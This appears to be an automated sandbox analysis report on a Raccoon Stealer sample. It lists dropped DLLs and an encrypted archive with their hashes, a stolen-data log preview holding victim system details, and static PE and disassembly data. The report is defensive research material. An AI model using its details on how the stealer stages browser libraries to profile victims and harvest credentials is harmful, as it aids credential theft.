                                                                                                  SSDEEP:6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
                                                                                                  MD5:60ACD24430204AD2DC7F148B8CFE9BDC
                                                                                                  SHA1:989F377B9117D7CB21CBE92A4117F88F9C7693D9
                                                                                                  SHA-256:9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
                                                                                                  SHA-512:626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):132048
                                                                                                  Entropy (8bit):6.627391684128337
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
                                                                                                  MD5:5A49EBF1DA3D5971B62A4FD295A71ECF
                                                                                                  SHA1:40917474EF7914126D62BA7CDBF6CF54D227AA20
                                                                                                  SHA-256:2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
                                                                                                  SHA-512:A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20432
                                                                                                  Entropy (8bit):6.337521751154348
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
                                                                                                  MD5:4FE544DFC7CDAA026DA6EDA09CAD66C4
                                                                                                  SHA1:85D21E5F5F72A4808F02F4EA14AA65154E52CE99
                                                                                                  SHA-256:3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
                                                                                                  SHA-512:5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55760
                                                                                                  Entropy (8bit):6.738700405402967
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
                                                                                                  MD5:56E982D4C380C9CD24852564A8C02C3E
                                                                                                  SHA1:F9031327208176059CD03F53C8C5934C1050897F
                                                                                                  SHA-256:7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
                                                                                                  SHA-512:92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22480
                                                                                                  Entropy (8bit):6.528357540966124
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
                                                                                                  MD5:96B879B611B2BBEE85DF18884039C2B8
                                                                                                  SHA1:00794796ACAC3899C1FB9ABBF123FEF3CC641624
                                                                                                  SHA-256:7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
                                                                                                  SHA-512:DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):83408
                                                                                                  Entropy (8bit):6.436278889454398
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
                                                                                                  MD5:385A92719CC3A215007B83947922B9B5
                                                                                                  SHA1:38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
                                                                                                  SHA-256:06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
                                                                                                  SHA-512:9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):83408
                                                                                                  Entropy (8bit):6.436278889454398
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
                                                                                                  MD5:385A92719CC3A215007B83947922B9B5
                                                                                                  SHA1:38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
                                                                                                  SHA-256:06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
                                                                                                  SHA-512:9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):137168
                                                                                                  Entropy (8bit):6.784614237836286
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
                                                                                                  MD5:EAE9273F8CDCF9321C6C37C244773139
                                                                                                  SHA1:8378E2A2F3635574C106EEA8419B5EB00B8489B0
                                                                                                  SHA-256:A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
                                                                                                  SHA-512:06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):440120
                                                                                                  Entropy (8bit):6.652844702578311
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                                  MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                                  SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                                  SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                                  SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1245136
                                                                                                  Entropy (8bit):6.766715162066988
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
                                                                                                  MD5:02CC7B8EE30056D5912DE54F1BDFC219
                                                                                                  SHA1:A6923DA95705FB81E368AE48F93D28522EF552FB
                                                                                                  SHA-256:1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
                                                                                                  SHA-512:0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):336336
                                                                                                  Entropy (8bit):7.0315399874711995
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
                                                                                                  MD5:BDAF9852F588C86B055C846B53D4C144
                                                                                                  SHA1:03B739430CF9EADE21C977B5B416C4DD94528C3B
                                                                                                  SHA-256:2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
                                                                                                  SHA-512:19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):92624
                                                                                                  Entropy (8bit):6.639527605275762
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
                                                                                                  MD5:94919DEA9C745FBB01653F3FDAE59C23
                                                                                                  SHA1:99181610D8C9255947D7B2134CDB4825BD5A25FF
                                                                                                  SHA-256:BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
                                                                                                  SHA-512:1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\pB4pD1lB4sD3.zip
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2828315
                                                                                                  Entropy (8bit):7.998625956067725
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
                                                                                                  MD5:1117CD347D09C43C1F2079439056ADA3
                                                                                                  SHA1:93C2CE5FC4924314318554E131CFBCD119F01AB6
                                                                                                  SHA-256:4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
                                                                                                  SHA-512:FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24016
                                                                                                  Entropy (8bit):6.532540890393685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
                                                                                                  MD5:6099C438F37E949C4C541E61E88098B7
                                                                                                  SHA1:0AD03A6F626385554A885BD742DFE5B59BC944F5
                                                                                                  SHA-256:46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
                                                                                                  SHA-512:97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16336
                                                                                                  Entropy (8bit):6.437762295038996
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
                                                                                                  MD5:F3A355D0B1AB3CC8EFFCC90C8A7B7538
                                                                                                  SHA1:1191F64692A89A04D060279C25E4779C05D8C375
                                                                                                  SHA-256:7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
                                                                                                  SHA-512:6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):144848
                                                                                                  Entropy (8bit):6.54005414297208
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
                                                                                                  MD5:4E8DF049F3459FA94AB6AD387F3561AC
                                                                                                  SHA1:06ED392BC29AD9D5FC05EE254C2625FD65925114
                                                                                                  SHA-256:25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
                                                                                                  SHA-512:3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1142072
                                                                                                  Entropy (8bit):6.809041027525523
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                                                                  MD5:D6326267AE77655F312D2287903DB4D3
                                                                                                  SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                                                                  SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                                                                  SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):83784
                                                                                                  Entropy (8bit):6.890347360270656
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                  MD5:7587BF9CB4147022CD5681B015183046
                                                                                                  SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                  SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                  SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\yH9tY9hO9gL5
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1086
                                                                                                  Entropy (8bit):5.2830574160387265
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:m9S+jH/v2eJy6U3NetfVWLrBqhKQa70CGik/R8RA2Tvqzh:eSe32v3NetMfBgdCGik/R0A+0h
                                                                                                  MD5:2EC1521D004B232A0510736F73F39258
                                                                                                  SHA1:BE2D7A20FFC8B7CDF4E72AB329BE1F5C8019EEF7
                                                                                                  SHA-256:E5AA840CF074402943878F6364A23864004B975F4CFCD0C7B6855C67468CB12B
                                                                                                  SHA-512:73EB24A3E29D27B4214F27392C8828520270AE173952111AE3A83758EF181E4C64233D98C6BD8D8AEBCE32A7D4B072314DFC19618FB940DE2E534C3C7512C83A
                                                                                                  Malicious:false
                                                                                                  Preview: RACCOON STEALER | 1.8.1...Build compile date: Wed Sep 8 00:01:38 2021...Launched at: 2021.09.28 - 05:12:28 GMT...Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user...Running on a desktop......-------------...... - Cookies: 0... - Passwords: 0... - Files: 0......System Information:... - System Language: English... - System TimeZone: -8 hrs... - IP: 185.189.150.72... - Location: 47.366402, 8.554600 | Zurich, Zurich, Switzerland (8001)... - ComputerName: 849224... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)... - RAM: 8191 MB (5364 MB used)... - Screen resolution: 1280x1024... - Display devices:....0) Microsoft Basic Display Adapter......-------------......Installed Apps: ....Adobe Acrobat Reader DC (19.012.20035)....Google Chrome (85.0.4183.121)....Google Update Helper (1.3.35.451)....Java 8 Update 211 (8.0.2110.12)....Java Auto Updater (2.8.211.12)....
                                                                                                  \Device\Null
                                                                                                  Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                  Category:dropped
                                                                                                  Size (bytes):92
                                                                                                  Entropy (8bit):4.300553674183507
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
                                                                                                  MD5:F74899957624A2837F2F86E8E62E92D4
                                                                                                  SHA1:1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
                                                                                                  SHA-256:507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
                                                                                                  SHA-512:E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
                                                                                                  Malicious:false
                                                                                                  Preview: ..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.764401102130978
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                  • Clipper DOS Executable (2020/12) 0.02%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                  File name:31cGYywxgy.exe
                                                                                                  File size:422400
                                                                                                  MD5:7739202a73e3f1c15f5f5e6f82434955
                                                                                                  SHA1:cb0d64026ee41d99bf74a1b4939442eb53e4bd84
                                                                                                  SHA256:626999cdbd44d491c59a9fd35b302f3c18d4c0599c08b53b80716661b0e803ff
                                                                                                  SHA512:72a65e7a8ff27e4620abd0f37a3525b5f9fa94453206d36a0ed36fc979e5845f7c897d3f2a615eb7034cc5ef5a2ff42da14c0515f8dbfa2df4aba5b64077a5d1
                                                                                                  SSDEEP:6144:BNh3fbG8vHkGWJB0ONivFZFPPgVCbl2/MUu0D402NGl/Bee/53PHlcqfG:rdT9bIB0TtfICJ2/z3KiBeex3PHav

                                                                                                  File Icon

                                                                                                  Icon Hash:e0e4e8beb0e4c8ea

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x401b1e
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x5F9E828D [Sun Nov 1 09:40:29 2020 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f98cc9327e2d65cc6189a693f26e1c1d

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  call 00007F386094CA1Ah
                                                                                                  jmp 00007F3860949E2Dh
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                  xor ecx, ecx
                                                                                                  cmp eax, dword ptr [0045D008h+ecx*8]
                                                                                                  je 00007F3860949FC5h
                                                                                                  inc ecx
                                                                                                  cmp ecx, 2Dh
                                                                                                  jc 00007F3860949FA3h
                                                                                                  lea ecx, dword ptr [eax-13h]
                                                                                                  cmp ecx, 11h
                                                                                                  jnbe 00007F3860949FC0h
                                                                                                  push 0000000Dh
                                                                                                  pop eax
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  mov eax, dword ptr [0045D00Ch+ecx*8]
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  add eax, FFFFFF44h
                                                                                                  push 0000000Eh
                                                                                                  pop ecx
                                                                                                  cmp ecx, eax
                                                                                                  sbb eax, eax
                                                                                                  and eax, ecx
                                                                                                  add eax, 08h
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  call 00007F386094C67Fh
                                                                                                  test eax, eax
                                                                                                  jne 00007F3860949FB8h
                                                                                                  mov eax, 0045D170h
                                                                                                  ret
                                                                                                  add eax, 08h
                                                                                                  ret
                                                                                                  call 00007F386094C66Ch
                                                                                                  test eax, eax
                                                                                                  jne 00007F3860949FB8h
                                                                                                  mov eax, 0045D174h
                                                                                                  ret
                                                                                                  add eax, 0Ch
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  call 00007F3860949F97h
                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                  push ecx
                                                                                                  mov dword ptr [eax], ecx
                                                                                                  call 00007F3860949F37h
                                                                                                  pop ecx
                                                                                                  mov esi, eax
                                                                                                  call 00007F3860949F71h
                                                                                                  mov dword ptr [eax], esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  push 0000000Ch
                                                                                                  push 0045B5D8h
                                                                                                  call 00007F386094AD3Ah
                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                  xor edi, edi
                                                                                                  cmp ecx, edi
                                                                                                  jbe 00007F3860949FE0h
                                                                                                  push FFFFFFE0h
                                                                                                  pop eax
                                                                                                  xor edx, edx
                                                                                                  div ecx
                                                                                                  cmp eax, dword ptr [ebp+0Ch]
                                                                                                  sbb eax, eax
                                                                                                  inc eax
                                                                                                  jne 00007F3860949FD1h
                                                                                                  call 00007F3860949F43h
                                                                                                  mov dword ptr [eax], 0000000Ch
                                                                                                  push edi
                                                                                                  push edi
                                                                                                  push edi

                                                                                                  Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x5c1a0          0x52          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x5b92c          0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe3000          0xa8f0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x591c0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x5a480          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x59000          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                  Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x573f0       0x57400   False     0.964479987464   data       7.97515614602  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x59000          0x31f2        0x3200    False     0.2578125        data       4.20289808021  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x5d000          0x8557c       0x1e00    False     0.118229166667   data       1.32325585397  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0xe3000          0xa8f0        0xaa00    False     0.668818933824   data       6.06921969905  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name            RVA      Size    Type                  Language  Country
RT_ICON         0xe33f0  0xea8   data                  English   United States
RT_ICON         0xe4298  0x8a8   data                  English   United States
RT_ICON         0xe4b40  0x6c8   data                  English   United States
RT_ICON         0xe5208  0x568   GLS_BINARY_LSB_FIRST  English   United States
RT_ICON         0xe5770  0x25a8  data                  English   United States
RT_ICON         0xe7d18  0x10a8  data                  English   United States
RT_ICON         0xe8dc0  0x988   data                  English   United States
RT_ICON         0xe9748  0x468   GLS_BINARY_LSB_FIRST  English   United States
RT_ICON         0xe9c28  0x6c8   data                  English   United States
RT_ICON         0xea2f0  0x568   GLS_BINARY_LSB_FIRST  English   United States
RT_ICON         0xea858  0x25a8  data                  English   United States
RT_ICON         0xece00  0x468   GLS_BINARY_LSB_FIRST  English   United States
RT_STRING       0xed4c8  0x424   data
RT_ACCELERATOR  0xed2a8  0x50    data
RT_ACCELERATOR  0xed2f8  0x20    data
RT_GROUP_ICON   0xed268  0x3e    data                  English   United States
RT_GROUP_ICON   0xe9bb0  0x76    data                  English   United States
RT_VERSION      0xed318  0x1b0   data

Imports

DLL           Import
